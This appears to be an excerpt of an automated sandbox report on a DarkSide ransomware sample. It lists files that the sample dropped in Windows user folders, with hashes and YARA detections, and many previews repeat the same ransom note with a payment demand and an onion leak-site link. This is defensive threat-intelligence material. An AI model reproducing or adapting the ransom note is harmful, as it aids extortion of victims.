                                                                                      SSDEEP:3:A09EvB6hl/bJdAtiZIhXall:A5Kt4re
                                                                                      MD5:5DB88030C44E742C58C02D9BD3CAED65
                                                                                      SHA1:985AC0D2D0CEB93C055B8FCB35CA703DD4AF7B75
                                                                                      SHA-256:65783AEA2F43380F918BC71664CF21305EFDE5D453D7A54BBFA76D8887C41FD3
                                                                                      SHA-512:4ADFFCBAC07EEABF953E7351DAD655AA97D04E77CC2F5A6F77D3DE37A3B31C2CC21518C07AA59619621B660426B7FCFD75075B6EA8B2E01F1277E20788A31231
                                                                                      Malicious:false
                                                                                      Preview: *..H.....................................3...w..$....y.......w...............w.......w....:O.....w......................$....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: C:\README.2c9ccbf3.TXT, Author: Joe Security
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini.2c9ccbf3
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):224
                                                                                      Entropy (8bit):7.0704859487274
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:BPPEkTtpcbnYmM7E1cFw4aQmW5C8QVPbn4WEk/mxlNL5:B33tp8nVM7E1Kz5c3xQxz5
                                                                                      MD5:07E2AE220FFCB84C5D8EE4A7461F29B7
                                                                                      SHA1:F16D1AD28BB5FF13FEE295A2F8C74908A563A710
                                                                                      SHA-256:326EBC5FCCCF17C7546D1E45062D7E06653DB9640A02174E6A0BDC3BBA9FE7B9
                                                                                      SHA-512:D32E1607BD37F7D20DF79DC8D1CCCB7593D65E90771C04F4DE660C0570A85CA4DAEF1F5D703428919F6934DF72AD35BB0B2B6A4D52166D258A92D69A8CE24E1E
                                                                                      Malicious:false
                                                                                      Preview: '......*W.m....x.v.....g..........:V.H*u?..| ......[}.......w:.nK.6C2.f.3.W......8..`.XB.c..g+....3.....z.......+A9.....i.2..\..L.9"9...\Bf.q5w.Z.:.+3.hv.......i......?.!V...'Qw7..(.(.a..DI...D..x.l....~....h.Ya..
                                                                                      C:\Users\Default\AppData\Local\Microsoft\WindowsApps\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows\History\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Local\Temp\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
